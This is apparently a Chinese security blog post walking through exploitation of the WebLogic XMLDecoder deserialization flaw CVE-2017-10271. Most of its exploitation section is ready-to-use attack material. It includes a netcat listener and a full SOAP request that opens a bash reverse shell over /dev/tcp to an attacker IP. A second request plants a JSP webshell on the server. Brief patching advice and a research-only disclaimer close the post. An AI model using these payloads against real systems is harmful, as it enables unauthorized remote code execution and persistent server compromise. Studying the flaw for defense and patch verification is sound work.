CVE-2017-10271----WebLogic XMLDecoder解析漏洞 作者: ynnddddd 时间: 2025-03-31 分类: 网络安全,渗透实操 # WebLogic XMLDecoder 解析漏洞(CVE-2017-10271) <!--more--> ## 漏洞概述 WebLogic WLS 组件中存在 XMLDecoder 反序列化远程代码执行漏洞(CVE-2017-10271)。攻击者通过构造恶意 SOAP 请求,可对目标主机实现远程代码执行(RCE),进而控制服务器。 --- ## 漏洞原理 1. **触发组件**:`wls-wsat.war` 组件中的 `CoordinatorPortType` 接口。 2. **漏洞根源**:未授权访问的 `wls-wsat` 接口在处理 SOAP 请求时,未对 XML 数据反序列化过程进行安全校验,导致攻击者可注入恶意 XML 代码。 3. **反序列化工具**: - **XMLDecoder**:将 XML 数据反序列化为 Java 对象(位于 `java.beans` 包)。 - **XMLEncoder**:将 Java 对象序列化为 XML 格式(互补于 `ObjectOutputStream`)。 --- ## 受影响版本 - WebLogic 10.3.6.0.0 - WebLogic 12.1.3.0.0 - WebLogic 12.2.1.1.0 - WebLogic 12.2.1.2.0 --- ## 漏洞验证 访问以下 URL,若存在页面响应则可能存在漏洞: ```plaintext http://目标IP:7001/wls-wsat/CoordinatorPortType ``` --- ## 漏洞利用 ### 利用步骤 1. **监听攻击机**: 在攻击机上开启 `nc` 监听: ```bash nc -lvnp 9999 ```  2. **构造反弹 Shell 的 EXP** 发送以下恶意请求(需替换 `目标IP` 和 `攻击机IP`): ```http POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 目标IP:7001 User-Agent: Mozilla/5.0 Content-Type: text/xml Content-Length: 641 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"><string>/bin/bash</string></void> <void index="1"><string>-c</string></void> <void index="2"> <string>bash -i >& /dev/tcp/攻击机IP/9999 0>&1</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` **执行结果**:成功获取 WebLogic 服务进程权限(通常为 `weblogic` 用户)。  --- ### 写入 WebShell 构造请求上传 JSP 木马文件(替换 `目标IP` 和 `木马路径`): ```http POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 目标IP:7001 Content-Type: text/xml Content-Length: 639 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string> <void method="println"> <string><![CDATA[<% out.print("test"); %>]]></string> </void> <void method="close"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` **验证木马**:访问以下 URL,若返回 "test" 则上传成功: ```plaintext http://目标IP:7001/bea_wls_internal/test.jsp ``` --- ## 注意事项 1. **权限问题**: - WebLogic 默认以 `weblogic` 用户运行,**非 root 权限**。若需提权,需结合其他漏洞。 2. **路径随机性**: - 上传路径中的 `9j4dqk` 为随机目录名,需根据目标环境动态调整。 3. **防御措施**: - 升级至官方修复版本。 - 临时禁用 `wls-wsat` 组件访问权限。 --- ## 免责声明 本文仅用于安全研究与教学,严禁用于非法渗透测试! 标签: none